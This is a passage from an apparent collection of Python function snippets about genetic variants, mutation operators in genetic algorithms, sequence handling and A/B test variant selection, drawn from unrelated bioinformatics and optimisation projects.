overlap.\n if self.known_genes is not None and gene not in self.known_genes:\n variants = [ x for x in variants if x.is_cnv() ]\n \n # ignore intergenic variants\n if gene is None:\n for var in variants:\n if var.get_chrom() == self.debug_chrom and var.get_position() == self.debug_pos:\n print(var, \"lacks HGNC/gene symbol\")\n return []\n \n # Now that we are examining a single gene, check that the consequences\n # for the gene are in the required functional categories.\n variants = [ var for var in variants if var.child.is_lof(gene) or var.child.is_missense(var.child.is_cnv(), gene) ]\n if variants == []:\n return []\n \n for x in variants[0].child.info.symbols:\n try:\n symbol = x.get(gene, ['HGNC', 'SYMBOL', 'ENSG'])\n break\n except KeyError:\n continue\n logging.info(\"{}\\t{}\\tvariants: {}\\trequired_mode: {}\".format(\n family.child.get_id(), symbol, [str(x) for x in variants], gene_inh))\n \n if chrom_inheritance == \"autosomal\":\n finder = Autosomal(variants, family, known_gene, gene, self.cnv_regions)\n elif chrom_inheritance in [\"XChrMale\", \"XChrFemale\", \"YChrMale\"]:\n finder = Allosomal(variants, family, known_gene, gene, self.cnv_regions)\n \n return finder.get_candidate_variants()", "def mutation_count(variant):\n _validate_str(variant)\n if variant == WILD_TYPE_VARIANT:\n return 0\n elif variant == SYNONYMOUS_VARIANT:\n return 0\n else:\n result = [x.strip() for x in variant.split(\",\")]\n if len(set(result)) != len(result):\n raise ValueError(\"Duplicate mutant substrings found in variant\")\n return len(result)", "def get_external_variants(path, subsets):\n \n subsets = subsets.split(\",\")\n \n functional = [\"missense_variant\", \"frameshift_variant\", \"stop_gained\",\n \"splice_donor_variant\", \"splice_acceptor_variant\", \"inframe_deletion\",\n \"inframe_insertion\", \"start_lost\", \"stop_lost\",\n \"protein_altering_variant\", \"stop_retained_variant\",\n \"coding_sequence_variant\"]\n \n variants = pandas.read_table(path, sep=\"\\t\", compression=\"gzip\")\n variants = variants[variants[\"consequence\"].isin(functional)]\n variants = variants[variants[\"study_phenotype\"].isin(subsets)]\n \n # figure out the pubmed IDs for 
all the variants from the doi codes\n dois = variants[\"publication_doi\"].unique()\n pubmed_ids = [ doi_to_pubmed(x) for x in dois ]\n recode = dict(zip(dois, pubmed_ids))\n variants[\"pubmed\"] = variants[\"publication_doi\"].map(recode)\n \n return variants", "def slice_genome(self, fractions=0.2, at_idx=None):\n if type(at_idx) == int:\n at_idx = [at_idx]\n if type(fractions) == int:\n fractions = [fractions]\n idxs = []\n parts = []\n if fractions == [1]:\n return [GenomePart(self, 0, len(self.data)+1)]\n elif at_idx is None:\n idxs.append(np.random.randint(0, len(self)))\n if fractions is None:\n idxs = at_idx\n else:\n for frac in fractions:\n new_idx = idxs[-1]+int(len(self)*frac)\n if new_idx > len(self):\n new_idx -= len(self)\n idxs.append(new_idx)\n parts.append(GenomePart(self, idxs[-1], idxs[0]))\n for i in range(len(idxs)-1):\n parts.append(GenomePart(self, idxs[i], idxs[i+1]))\n return parts", "def test_mutation2(self):\n genotype = '0|0|2|0|0|2|0|0 1|0|0|1|1|0|0|0 0|1|0|0|0|0|2|1--1 7'\n search_space = {'dil_conv_3x3', 'dil_conv_5x5', 'dil_conv_7x7',\n 'skip_connect', 'clinc_3x3', 'clinc_7x7', 'avg_pool_3x3', 'max_pool_3x3'}\n\n mutator = Mutations(search_space, prob_mutation=0.8,\n prob_resize=0.99, prob_swap=0.99)\n mutated_g = mutator(genotype)\n a, s, d = get_conf(mutated_g)\n mutator.update_strat_good(a)", "def variants(\n self,\n *,\n samples=None,\n isolated_as_missing=None,\n alleles=None,\n impute_missing_data=None,\n copy=None,\n left=None,\n right=None,\n ):\n interval = self._check_genomic_range(left, right)\n if impute_missing_data is not None:\n warnings.warn(\n \"The impute_missing_data parameter was deprecated in 0.3.0 and will\"\n \" be removed. Use ``isolated_as_missing=False`` instead of\"\n \"``impute_missing_data=True``.\",\n FutureWarning,\n )\n # Only use impute_missing_data if isolated_as_missing has the default value\n if isolated_as_missing is None:\n isolated_as_missing = not impute_missing_data\n if copy is None:\n copy = True\n # See comments for the Variant type for discussion on why the\n # present form was chosen.\n variant = tskit.Variant(\n self,\n samples=samples,\n isolated_as_missing=isolated_as_missing,\n alleles=alleles,\n )\n if left == 0 and right == self.sequence_length:\n start = 0\n stop = self.num_sites\n else:\n start, stop = np.searchsorted(self.sites_position, interval)\n\n if copy:\n for site_id in range(start, stop):\n variant.decode(site_id)\n yield variant.copy()\n else:\n for site_id in range(start, stop):\n variant.decode(site_id)\n yield variant", "def test_get_multiallelic_variant_by_locus(self):\n v = truth.variants[\"locus_rs9628434\"]\n # Coded allele to expected genotypes.\n expected = {\n \"T\": truth.genotypes[\"subal_2_rs9628434\"],\n \"A\": truth.genotypes[\"subal_3_rs9628434\"]\n }\n with self.reader_f() as f:\n for g in f.get_variant_genotypes(v):\n self.assertEqual(\n expected[g.coded], g\n )\n del expected[g.coded]\n\n self.assertEqual(len(expected), 0)", "def runVariantDiscovery(self, sample):\n\t\t# -------------------------------- Variant Discovery Command -----------------------------\n\t\tsomaticsniper_command = \"\"\"{program} \\\n\t\t\t-q 1 \\\n\t\t\t-Q 15 \\\n\t\t\t-s 0.01 \\\n\t\t\t-T 0.85 \\\n\t\t\t-N 2 \\\n\t\t\t-r 0.001 \\\n\t\t\t-G \\\n\t\t\t-L \\\n\t\t\t-n NORMAL \\\n\t\t\t-t TUMOR \\\n\t\t\t-F vcf \\\n\t\t\t-f {reference} {tumor} {normal} {outputfile}\"\"\".format(\n\t\t\t\tprogram = self.program,\n\t\t\t\treference = self.reference,\n\t\t\t\ttumor = sample['TumorBAM'],\n\t\t\t\tnormal = 
sample['NormalBAM'],\n\t\t\t\toutputfile = self.raw_variants\n\t\t\t)\n\t\tlabel = \"SomaticSniper Variant Discovery\"\n\t\toutput_result = self.runCallerCommand(somaticsniper_command, label, self.raw_variants)\n\t\treturn output_result", "def get_variant_genotypes(self, variant):\n if not self.has_index:\n raise NotImplementedError(\"Not implemented when IMPUTE2 file is \"\n \"not indexed (see genipe)\")\n\n # Find the variant in the index\n try:\n impute2_chrom = CHROM_STR_TO_INT[variant.chrom.name]\n except KeyError:\n raise ValueError(\n \"Invalid chromosome ('{}') for IMPUTE2.\".format(variant.chrom)\n )\n\n variant_info = self._impute2_index[\n (self._impute2_index.chrom == impute2_chrom) &\n (self._impute2_index.pos == variant.pos)\n ]\n\n if variant_info.shape[0] == 0:\n logging.variant_not_found(variant)\n return []\n\n elif variant_info.shape[0] == 1:\n return self._get_biallelic_variant(variant, variant_info)\n\n else:\n return self._get_multialleic_variant(variant, variant_info)", "def mutate_snp(genome, var):\n nt_options = {'A':['T','G','C'], 'T':['A','G','C'], 'G':['A','T','C'], 'C':['A','T','G']}\n n = random.randint(0,2)\n nt = nt_options.get(genome.seq[var.start])[n]\n genome.mut_seq[var.start] = nt\n\n var.ref = genome.seq[var.start]\n var.alt = nt", "def show_variant(environ, experiment, record=False, variant=None):\n swab = environ['swab.swab']\n exp = swab.experiments[experiment]\n variants = exp.weighted_variants\n swabid = _getswabid(environ)\n\n if not swab.include(environ, experiment):\n variant = variant if variant is not None else exp.control\n\n # Make sure bots don't receive randomized variants. Google's advice\n # (as of August 2017): show the version the majority of users see.\n # Failing that, show a consistent version (don't randomize)\n # https://www.youtube.com/watch?v=EaSyuH2D7Mw&start=1920\n if is_bot(environ):\n variant = variant if variant is not None else exp.control\n\n if variant is None:\n request = Request(environ)\n variant = request.query.get('swab.' + experiment)\n if variant is not None and variant in variants:\n return variant\n\n # Get a random int in the range 0 ≤ x < len(variants)\n #\n # We do this in preference to calling random.choice because\n # it guarantees a particular property of the sampling if the list of\n # variants changes.\n #\n # For example, given a list of variants ``['a', 'b']``\n # we will choose a variant according to the output of\n # `r = rng.random()` such that\n #\n # 0.0 ≤ r < 0.5 → 'a'\n # 0.5 ≤ r < 1.0 → 'b'\n #\n # if later we find that 'a' is winning and want to exploit that\n # variant, we could change the list of variants to\n # ``['a', 'a', 'a', 'b']``, and the mapping would become:\n #\n # 0.0 ≤ r < 0.75 → 'a'\n # 0.75 ≤ r < 1.0 → 'b'\n #\n # Notice that the range corresponding to variant 'a' completely\n # contains the old values - ie users who previously saw the winning\n # variant 'a' will continue to see that variant.\n r = int(get_rng(environ, exp, swabid).random() * len(variants))\n variant = variants[r]\n\n if variant not in variants:\n raise ValueError(\"Invalid variant {!r}. 
Choices are: {!r}\"\n .format(variant, variants))\n\n environ['swab.invoked'] = True\n\n invoked = environ.setdefault('swab.experiments_invoked', set())\n if experiment in invoked:\n return variant\n invoked.add(experiment)\n\n if not record or is_bot(environ):\n return variant\n\n path = os.path.join(swab.datadir, experiment, variant, '__all__')\n try:\n f = open(path, 'a')\n except IOError:\n makedir(os.path.dirname(path))\n f = open(path, 'a')\n\n try:\n f.write(_logline(swabid))\n finally:\n f.close()\n return variant", "def get_donor_mut_for_guides(self, guides_df, guides_ids, donor_mut_type, num_donor_variants = 1,\n mut_pos_in_guide = None, donor_length=100, donor_seq_offsets=[0],\n set_name = \"\", min_dist_cut_to_donor_edge = 30, excluded_seqs = [], do_revcomp_donor = False, scramble_guide_and_donor = False):\n out_guide_donor_df = pd.DataFrame(data=None)\n\n for donor_seq_offset in donor_seq_offsets:\n \n # TODO - this should be removed after implementing donors with offsets \n if np.isnan(donor_seq_offset):\n raise ValueError(\"None/NaN offsets not implemented for gene guides - TODO...\")\n \n for guide_id in guides_ids:\n \n #print \"guide_id %s , donor_seq_offset %d\" % (guide_id, donor_seq_offset) #DEBUG\n \n cur_guide_guide_donor_df = self.get_donor_mut_for_guide(guides_df, guide_id, donor_mut_type, num_donor_variants,\n mut_pos_in_guide, donor_length,int(donor_seq_offset), set_name,\n min_dist_cut_to_donor_edge,do_revcomp_donor, scramble_guide_and_donor)\n out_guide_donor_df = out_guide_donor_df.append(cur_guide_guide_donor_df,ignore_index=True)\n \n #print cur_guide_guide_donor_df.shape[0]\n #print out_guide_donor_df.shape[0]\n \n if out_guide_donor_df.shape[0] > 0:\n out_guide_donor_df['contain_excluded_sequences'] = out_guide_donor_df['donor_seq'].str.contains( '|'.join(excluded_seqs) )\n\n return(out_guide_donor_df.reset_index(drop=True))", "def derived_subgroup(self):\n r = self._r\n gens = [p._array_form for p in self.generators]\n set_commutators = set()\n degree = self._degree\n rng = list(range(degree))\n for i in range(r):\n for j in range(r):\n p1 = gens[i]\n p2 = gens[j]\n c = list(range(degree))\n for k in rng:\n c[p2[p1[k]]] = p1[p2[k]]\n ct = tuple(c)\n if ct not in set_commutators:\n set_commutators.add(ct)\n cms = [_af_new(p) for p in set_commutators]\n G2 = self.normal_closure(cms)\n return G2", "def get_variants_by_protein_position(self, _transcript_id, _protein_pos):\n try:\n p = self.proteins[_transcript_id]\n if _protein_pos not in self.proteinPos[_transcript_id]:\n raise ValueError(\"Peptide does not start a \"\n \"{pos} in protein with transcript ID {transcript}\".format(pos=_protein_pos,\n transcript=_protein_pos))\n var = dict()\n fs = dict()\n shift = 0\n for i in xrange(_protein_pos):\n for v in p.vars.get(i, []):\n if v.type in [VariationType.FSDEL, VariationType.FSINS]:\n shift = (v.get_shift()+shift) % 3\n if shift:\n fs.setdefault(i-_protein_pos, []).append(v)\n else:\n fs.clear()\n for j in xrange(_protein_pos, _protein_pos+len(self)):\n for v in p.vars.get(j, []):\n var.setdefault(j, []).append(v)\n fs.update(var)\n return fs\n except KeyError:\n raise ValueError(\"Peptide does not origin from protein with \"\n \"transcript ID {transcript}\".format(transcript=_transcript_id))", "def _get_dscp_mutation(self):\n return self.__dscp_mutation", "def convert_to_dna(protein_sequence, wt_protein_dict):\n variant_dna_codons = []\n for index in range(0, len(protein_sequence.seq)):\n wt_aa = str(wt_protein_dict[index + 1][0])\n codon = 
str(wt_protein_dict[index + 1][1])\n variant_aa = protein_sequence.seq[index]\n if variant_aa != wt_aa:\n if variant_aa is not '-':\n codon = sorted_codon_table[str(variant_aa)][0]\n variant_dna_codons.append(codon)\n variant_dna_str = \"\".join(variant_dna_codons)\n variant_dna_seq = Seq(variant_dna_str, IUPAC.unambiguous_dna)\n variant_dna_seq_obj = SeqRecord(variant_dna_seq, id=protein_sequence.id, name=protein_sequence.name,\n description=protein_sequence.description)\n return variant_dna_seq_obj", "def test_mutation(self):\n genotype = '0|0|2|0|0|2|0|0 1|0|0|1|1|0|0|0 0|1|0|0|0|0|2|1--1 7'\n search_space = {'dil_conv_3x3', 'dil_conv_5x5', 'dil_conv_7x7',\n 'skip_connect', 'clinc_3x3', 'clinc_7x7', 'avg_pool_3x3', 'max_pool_3x3'}\n\n mutator = Mutations(search_space, prob_mutation=0.8,\n prob_resize=0.99, prob_swap=0.99)\n mutated_g = mutator(genotype)\n mutated_g = mutator(mutated_g)\n mutated_g = mutator(mutated_g)\n a, s, d = get_conf(mutated_g)\n print('---->', mutated_g)\n self.assertGreaterEqual(10, d)\n self.assertTrue(s in (0, 1))\n a = torch.tensor(a)\n d = int((a.shape[0]*2)**.5)\n start = 0\n for i in range(d):\n end = int((i+1)*(i+2)/2)\n self.assertTrue(a[start:end, :].sum() > 0)\n start = end", "def _multiple_entity_mutated(self, mut_dat, output, variant, item, translocations, fusions, all_except):\n if self.version == \"canc\":\n variant = \"gene\"\n else:\n variant = \"DepMap_ID\"\n\n out_dict = {\"names\": lambda x: list(set(x[self.by[self.version]])), #functions for returning specific data types\n \"dataframe\": lambda x: x}\n\n if output == \"dict\":\n out = {k:mut_dat[self.by[self.version]].loc[v].unique() for k,v in mut_dat.groupby(variant).groups.items()}\n else:\n out = out_dict[output](mut_dat)\n\n return out", "def caterpillar_sub_sequence(frame, new, cat_length):\n sub_sequence = []\n\n for index, _ in enumerate(frame):\n current = frame.copy()\n current[index] = new\n for cell in range(cat_length):\n tail_index = index - cell\n if tail_index >= 0:\n current[tail_index] = new\n\n sub_sequence.append(current)\n\n if all([item == new for item in current[index:]]):\n return sub_sequence", "def simple_mutator(chromosome, genes, properties):\n mutated_chromosome = list(chromosome)\n for i in range(len(chromosome)):\n if random.random() < properties.mutation_probability:\n mutated_chromosome[i] = random.choice(genes)\n return mutated_chromosome", "def _mutant(self, idx, F):\r\n # Generate random indices\r\n r = torch.randint(self.pop_size, (3,))\r\n # Re-generate if it contains candidate index\r\n while r[1] == r[0] or r[2] == r[0] or r[2] == r[1] or (idx in r):\r\n r = torch.randint(0, self.pop_size, (3,))\r\n \r\n\r\n # Compute mutant\r\n mutant = self.population[r[0]] + \\\r\n self.k_val * (self.population[self.best] - self.population[r[0]]) + \\\r\n F * (self.population[r[2]] - self.population[r[1]])\r\n #mutant = mutant.to(self.device)\r\n # Crossover\r\n probs = torch.rand(mutant.shape[0],device = self.device)\r\n \r\n return torch.where(probs >= self.cross_prob,self.population[idx],mutant)", "def translate_DNA(dnaseq):\n\n gen = aa_generator_DNA(dnaseq)\n seq = ''\n aa = next(gen, None)\n while aa:\n seq += aa\n aa = next(gen, None)\n return seq", "def get_merged_variants(self, variants, key):\n # type: (List[vcfio.Variant], str) -> List[vcfio.Variant]\n raise NotImplementedError", "def get_subs(n):\n \n from itertools import product\n return [''.join(sub) for sub in product('CATGN', repeat=n)]", "def subset(S, i, sub):\n if i == len(s): # if the last element 
was reached\n print(sub)\n else:\n subset(S, i + 1, sub) # clone subset of super-subset\n subset(S, i + 1, [*sub, S[i]]) # new subset by adding S[i] to super-subset", "def introduce_random_mutations(vntr, m):\n\t\n\tmutation_sites = np.random.choice(range(len(vntr)), m, replace=False)\n\tm_vntr = []\n\tfor site, nucleotide in enumerate(vntr):\n\t\tif site in mutation_sites:\n\t\t\tm_vntr.append(generate_mutation(nucleotide))\n\t\telse:\n\t\t\tm_vntr.append(nucleotide)\n\treturn ''.join(m_vntr)", "def mutate(dna):\n dna_out = \"\"\n mutation_chance = 0.01\n for c in range(DNA_SIZE):\n if random.uniform(0, 1) < mutation_chance:\n dna_out += random_char()\n else:\n dna_out += dna[c]\n return dna_out", "def random_element(self, mutable=False):\n from sage.groups.perm_gps.permgroup import PermutationGroup\n\n l = self._length\n d = self._degree\n Sd = self._sym\n\n g = [Sd.random_element() for _ in range(l - 1)]\n G = PermutationGroup(g)\n while not G.degree() == d or (self._connected and\n not G.is_transitive()):\n g = [Sd.random_element() for _ in range(l - 1)]\n G = PermutationGroup(g)\n\n return self([sigma.domain() for sigma in g] + [None], mutable=mutable)", "def nonuniform_mutation(random, candidate, args):\r\n bounder = args['_ec'].bounder\r\n num_gens = args['_ec'].num_generations\r\n max_gens = args['max_generations']\r\n strength = args.setdefault('mutation_strength', 1)\r\n exponent = (1.0 - num_gens / float(max_gens)) ** strength\r\n mutant = copy.copy(candidate)\r\n for i, (c, lo, hi) in enumerate(zip(candidate, bounder.lower_bound, bounder.upper_bound)):\r\n if random.random() <= 0.5:\r\n new_value = c + (hi - c) * (1.0 - random.random() ** exponent)\r\n else:\r\n new_value = c - (c - lo) * (1.0 - random.random() ** exponent)\r\n mutant[i] = new_value\r\n return mutant", "def mutate(self, child):\n for i in range(0, self.chromosome_length):\n if random.randint(1, 100) <= self.mutation_chance:\n child[i] = self.random_gene()\n return child", "def getdviolvar(self,whichsol_,sub,viol): # 3\n if not isinstance(whichsol_,soltype): raise TypeError(\"Argument whichsol has wrong type\")\n num_ = None\n if num_ is None:\n num_ = len(sub)\n elif num_ != len(sub):\n raise IndexError(\"Inconsistent length of array sub\")\n if num_ is None: num_ = 0\n if sub is None: raise TypeError(\"Invalid type for argument sub\")\n if sub is None:\n sub_ = None\n else:\n try:\n sub_ = memoryview(sub)\n except TypeError:\n try:\n _tmparr_sub = array.array(\"i\",sub)\n except TypeError:\n raise TypeError(\"Argument sub has wrong type\")\n else:\n sub_ = memoryview(_tmparr_sub)\n \n else:\n if sub_.format != \"i\":\n sub_ = memoryview(array.array(\"i\",sub))\n \n if viol is None: raise TypeError(\"Invalid type for argument viol\")\n _copyback_viol = False\n if viol is None:\n viol_ = None\n else:\n try:\n viol_ = memoryview(viol)\n except TypeError:\n try:\n _tmparr_viol = array.array(\"d\",viol)\n except TypeError:\n raise TypeError(\"Argument viol has wrong type\")\n else:\n viol_ = memoryview(_tmparr_viol)\n _copyback_viol = True\n else:\n if viol_.format != \"d\":\n viol_ = memoryview(array.array(\"d\",viol))\n _copyback_viol = True\n if viol_ is not None and len(viol_) != (num_):\n raise ValueError(\"Array argument viol has wrong length\")\n res = self.__obj.getdviolvar(whichsol_,num_,sub_,viol_)\n if res != 0:\n result,msg = self.__getlasterror(res)\n raise Error(rescode(res),msg)\n if _copyback_viol:\n viol[:] = _tmparr_viol", "def variants(self, phrase: Union[str, Phrase]) -> Union[None, 
List[Phrase]]:\n phrase_string = phrase.phrase_string if isinstance(phrase, Phrase) else phrase\n if phrase_string not in self.has_variants:\n return None\n else:\n return [self.variant_index[variant_string] for variant_string in self.has_variants[phrase_string]]", "def mutatation(self, indiv: Tour) -> Tour:\n n = indiv.size()\n for i in range(n):\n if random.random() < self.mutation_rate:\n j = int(random.random() * n)\n\n # Swap 2 genes (cities)\n indiv.tour_ids[i], indiv.tour_ids[j] = indiv.tour_ids[j], indiv.tour_ids[i]\n\n # Update fitness\n indiv.compute_fitness(self.map.get())\n return indiv", "def test_get_subalignment_sequence_order_maintained(self):\n result = AlignedSeq.get_sub_alignment_by_list_id([\"s3\", \"s1\"], self.alignment)\n expected = MultipleSeqAlignment([self.alignment[0], self.alignment[2]])\n self.assertTrue(msas_equal(expected, result))", "def mutation(population):\r\n global decryption_key\r\n\r\n bases = ['A', 'C', 'G', 'T']\r\n alter_dna_table = alter_dna_bases(bases)\r\n\r\n decryption_key += mutation_table_del + str(alter_dna_table) + mutation_table_del\r\n\r\n new_population = []\r\n for chromosome in population:\r\n decryption_key += chromosome_del\r\n\r\n # apply the complement\r\n b_chromosome = dna_to_bits(chromosome, utils.dna_base_to_two_bits_table)\r\n decryption_key += complement_mutation_del\r\n point1 = random.randint(0, len(b_chromosome) - 1)\r\n point2 = random.randint(point1, len(b_chromosome) - 1)\r\n decryption_key += \"(%s, %s)\" % (point1, point2)\r\n decryption_key += complement_mutation_del\r\n b_chromosome = complement(b_chromosome, point1, point2)\r\n\r\n # convert each 4 bits in chromosome to two dna bases using four_bits_to_two_dna_base_table\r\n four_bits_vector = group_bits(b_chromosome, 4)\r\n\r\n last_dna_base = None\r\n # if the last element is of length 2, don't convert it\r\n if len(four_bits_vector[len(four_bits_vector) - 1]) == 2:\r\n last_dna_base = utils.two_bits_to_dna_base_table[four_bits_vector[len(four_bits_vector) - 1]]\r\n\r\n # convert only the 4 bits elements\r\n four_bits_vector = four_bits_vector[:-1]\r\n\r\n dna_seq = bits_to_dna(four_bits_vector, utils.four_bits_to_two_dna_base_table)\r\n if last_dna_base is not None:\r\n dna_seq += last_dna_base\r\n\r\n # and then alter the dna bases between point1 and point2\r\n decryption_key += alter_mutation_del\r\n point1 = random.randint(0, len(dna_seq) - 1)\r\n point2 = random.randint(point1, len(dna_seq) - 1)\r\n decryption_key += \"(%s, %s)\" % (point1, point2)\r\n decryption_key += alter_mutation_del\r\n new_chromosome = \"\"\r\n for i in range(len(dna_seq)):\r\n if i >= point1 and i <= point2:\r\n new_chromosome += alter_dna_table[dna_seq[i]]\r\n else:\r\n new_chromosome += dna_seq[i]\r\n\r\n new_population.append(new_chromosome)\r\n\r\n decryption_key += chromosome_del\r\n\r\n return new_population", "def sample_from_subpop(instance, params, subpop):\n y = subpop\n x = np.random.choice([-1,+1], size=params['d'])\n x[instance['indices'][subpop]] = instance['values'][subpop]\n return x, y, subpop", "def _get_biallelic_variant(self, variant, info, _check_alleles=True):\n info = info.iloc[0, :]\n assert not info.multiallelic\n\n # Seeking and parsing the file\n self._impute2_file.seek(info.seek)\n genotypes = self._parse_impute2_line(self._impute2_file.readline())\n\n variant_alleles = variant._encode_alleles([\n genotypes.reference, genotypes.coded,\n ])\n if (_check_alleles and variant_alleles != variant.alleles):\n # Variant with requested alleles is unavailable.\n 
logging.variant_not_found(variant)\n return []\n\n return [genotypes]", "def mutate_random(self, n=1):\n mutated_dna = self._dna\n for i in range(n):\n mutated_dna = mutate(mutated_dna)\n return Gene(mutated_dna, self._exon_regions)", "def dna(self):\n return self.seq.replace('U', 'T').replace('u', 't')", "def siblinghood_sim_partial(siblinghood_1, siblinghood_2):\n return SubstructureAgreement.substructure_sim_partial(siblinghood_1, siblinghood_2)", "def grch38_braf_genom_silent_mutation():\n params = {\n \"id\": \"normalize.variation:NC_000007.13%3Ag.140453136%3D\",\n \"type\": \"VariationDescriptor\",\n \"variation_id\": \"ga4gh:VA.aMwnr5rEbtPQe5gXDDO2gZO_zSqN2RmH\",\n \"variation\": {\n \"_id\": \"ga4gh:VA.aMwnr5rEbtPQe5gXDDO2gZO_zSqN2RmH\",\n \"location\": {\n \"_id\": \"ga4gh:VSL.zga82-TpYiNmBESCfvDvAz9DyvJF98I-\",\n \"interval\": {\n \"end\": {\"value\": 140753336, \"type\": \"Number\"},\n \"start\": {\"value\": 140753335, \"type\": \"Number\"},\n \"type\": \"SequenceInterval\"\n },\n \"sequence_id\": \"ga4gh:SQ.F-LrLMe1SRpfUZHkQmvkVKFEGaoDeHul\",\n \"type\": \"SequenceLocation\"\n },\n \"state\": {\n \"sequence\": \"A\",\n \"type\": \"LiteralSequenceExpression\"\n },\n \"type\": \"Allele\"\n },\n \"molecule_context\": \"genomic\",\n \"structural_type\": \"SO:0002073\",\n \"vrs_ref_allele_seq\": \"A\"\n }\n return VariationDescriptor(**params)", "def indel_of_nucl(\n SNPSeq, ID,\n INDEL_arr, OGSeq\n ):\n\n # intialize holders for coordinate (COORD), type (TYPE), modified nucleotide (MOD), and IndelSNPSeq\n COORD = ''\n TYPE = ''\n MOD = ''\n IndelSNPSeq = ''\n\n # initialize counter for how many total nucleotides have been removed or deleted\n indelCNT = 0\n\n # if there are indels, modify the sequence accordingly\n if len(INDEL_arr) > 0:\n # loop through indel mutations and modify the sequence accordingly\n for indel in INDEL_arr:\n\n # assign coordinate (COORD), old nucleotide (OLD), and new/snp nucleotide (NEW)\n COORD = indel[1]\n TYPE = indel[2]\n MOD = indel[3]\n COORD = int(COORD)-1+indelCNT\n\n # if a deletion check that the nucleotide matches\n if TYPE == '-':\n # check if coordinate matches the old nucleotide\n if SNPSeq[COORD] == SNPSeq[COORD+len(MOD)]: \n # populate indelSNPSeq with SNPSeq without the MOD nucleotide \n IndelSNPSeq = SNPSeq[:COORD] + SNPSeq[COORD + 1:]\n # reset SNPSeq to be the new nucleotide sequence\n SNPSeq = IndelSNPSeq\n # subtract length of MOD sequence\n indelCNT=indelCNT-len(MOD)\n else:\n print(SNPSeq[(COORD):(COORD+2)])\n print(\"\\nPosition\", COORD+1, \"is a\", SNPSeq[COORD], \"and not a\", MOD)\n print(\"Check that the correct position has been specified\\n\")\n sys.exit()\n\n # if a deletion check that the nucleotide matches\n elif TYPE == '+':\n # populate indelSNPSeq with SNPSeq without the MOD nucleotide \n IndelSNPSeq = SNPSeq[:COORD+1] + MOD + SNPSeq[COORD + 1:]\n # reset SNPSeq to be the new nucleotide sequence\n SNPSeq = IndelSNPSeq\n # add length of MOD sequence\n indelCNT=indelCNT+len(MOD)\n\n # pass to print_results function\n print_results(\n ID, IndelSNPSeq, OGSeq\n )\n\n # if there are no indels, pass to print_results function\n elif len(INDEL_arr) == 0:\n IndelSNPSeq = SNPSeq\n # pass to print_results\n print_results(\n ID, IndelSNPSeq, OGSeq\n )", "def get_variant_by_name(self, name, variant_info=None):\n # From 1.3.2 onwards, PyPlink sets unique names.\n if not self.has_index:\n raise NotImplementedError(\"Not implemented when IMPUTE2 file is \"\n \"not indexed (see genipe)\")\n\n # Getting the seek position\n if 
variant_info is None:\n try:\n variant_info = self._impute2_index.loc[name, :]\n\n except KeyError:\n if name in self.get_duplicated_markers():\n # The variant is a duplicated one, so we go through all the\n # variants with the same name and the :dupx suffix\n return [\n self.get_variant_by_name(dup_name).pop()\n for dup_name in self.get_duplicated_markers()[name]\n ]\n\n else:\n # The variant is not in the index\n logging.variant_name_not_found(name)\n return []\n\n # Seeking to the right place in the file\n self._impute2_file.seek(variant_info.seek)\n\n # Parsing the file\n genotypes = self._parse_impute2_line(self._impute2_file.readline())\n\n # Fixing the object\n self._fix_genotypes_object(genotypes, variant_info)\n\n return [genotypes]", "def getSequence( self,\n contig, \n strand = \"+\", \n start = 0, \n end = 0,\n converter = None,\n as_array = False):\n\n if not self.mIsLoaded: self.__loadIndex()\n\n if contig in self.mSynonyms:\n contig = self.mSynonyms[contig]\n\n if contig not in self.mIndex:\n raise KeyError, \"%s not in index\" % contig\n\n data = self.mIndex[contig]\n # dummy is\n # -> pos_seq for seekable streams\n # -> block_size for unseekable streams\n pos_id, dummy, lsequence = data[:3]\n pos_seq = dummy\n block_size = dummy\n \n if end == 0: end = lsequence\n \n if end > lsequence:\n raise ValueError(\"3' coordinate on %s out of bounds: %i > %i\" % (contig, end, lsequence))\n if start < 0:\n raise ValueError(\"5' coordinate on %s out of bounds: %i < 0\" % (contig, start))\n\n if converter:\n first_pos, last_pos = converter( start, end,\n str(strand) in (\"+\", \"1\"),\n lsequence )\n else:\n first_pos, last_pos = start, end\n if str(strand) in (\"-\", \"0\", \"-1\"):\n first_pos, last_pos = lsequence - last_pos, lsequence - first_pos\n \n assert( first_pos < last_pos )\n \n p = SArray( \"c\" )\n \n if self.mNoSeek:\n ## read directly from position\n p.fromstring( self.mDatabaseFile.read( block_size, data[3], first_pos, last_pos) )\n else:\n first_pos += pos_seq\n last_pos += pos_seq\n\n self.mDatabaseFile.seek( first_pos )\n p.fromstring( self.mDatabaseFile.read( last_pos - first_pos ) )\n\n if str(strand) in (\"-\", \"0\", \"-1\"):\n p.reverse() \n p = SArray(\"c\",\n string.translate( p[:],\n string.maketrans(\"ACGTacgt\", \"TGCAtgca\") ) )\n\n if as_array:\n return p\n else:\n # cast to string\n return p[:]", "def get_fragment(genome, chr, slen, spos):\n \n return genome[chr][spos:spos+slen]", "def getMutation(AA,Codon):\r\n temp_mutationlist = []\r\n '''create a list of possible triplets within hamming distance 1 '''\r\n for item in INI.genetic_code.keys():\r\n isvalid = INI.isvalidtriplet(item,Codon)\r\n ''' Hamming distance 1, AA is not equal to the given AA,forbid mutation to stopcodon '''\r\n if (isvalid == True and AA !=INI.genetic_code[item] and INI.genetic_code[item]!=\"*\"):\r\n temp_mutationlist.append(item)\r\n \r\n \r\n aalist = []\r\n # generate a list of all possible amino acids resulting from the temp_mutationlist \r\n for item in temp_mutationlist:\r\n if (item in INI.genetic_code):\r\n aalist.append(INI.genetic_code[item])\r\n else:\r\n aalist.append(\"n\")\r\n \r\n return(temp_mutationlist,aalist)", "def parse(v, cpy):\n if v.samples[0]['GT'][cpy] == 0: # Not present in this copy\n return None\n alt = v.samples[0].alleles[cpy]\n l_r, l_a = len(v.ref), len(alt)\n if l_r == 1:\n if l_a == 1:\n op, op_len = 'X', 0\n else:\n op, op_len = 'I', l_a - l_r\n elif l_a == 1:\n op, op_len = 'D', l_r - l_a\n else:\n raise ValueError(\"Complex variants present 
